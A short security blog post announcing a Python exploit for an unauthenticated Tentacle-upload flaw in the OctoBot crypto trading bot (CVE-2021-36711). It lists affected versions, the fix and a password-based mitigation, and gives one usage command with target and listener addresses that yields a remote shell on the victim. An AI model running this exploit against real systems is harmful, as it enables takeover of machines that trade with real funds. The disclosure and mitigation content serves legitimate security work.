Sashimi Evil OctoBot Tentacle is a python script that exploits a vulnerability that lies in the Tentacles upload functionality of the cryptocurrency trading bot OctoBot which is designed to be easy to use and customizable. Indeed, this open source trading bot has the particularity of offering to theirs users the possibility to upload their own trading algorithms.
Sashimi Evil OctoBot Tentacle takes advantage of this feature to upload a malicious crafted package that leads to an arbitrary code execution.
All OctoBot versions until the latest version (0.4.0b12) are vulnerable. However, this exploit will work from version 0.4.0b3 until version 0.4.1.
(PoC Tested on Octobot 0.4.0b10)
Funny isn't it?
More in depth tutorial video by @CodeMaru:
As usual the 3 scripts presented are open source and available on GitHub at the following address:
python3 sashimi.py --RHOST TARGET_IP --RPORT TARGET_PORT --LHOST YOUR_IP --LPORT YOUR_OPEN_PORT
Be patient for around 3 min, the time to download, create and upload the malicious Tentacle package, and you should have a remote access to the machine. That’s it!
To protect against this attack, set a password in your OctoBot platform or add an .htpasswd.
[Update] A new version, 0.4.4, that fix the vulnerability has been released.
https://github.com/Drakkar-Software/OctoBot/issues/1966
FOR EDUCATIONAL PURPOSE ONLY.
https://nvd.nist.gov/vuln/detail/CVE-2021-36711
Thanks for reading this article! I hope you could learn something through our research! If you liked what you read, please share and follow us on twitter at @NeroTeamLabs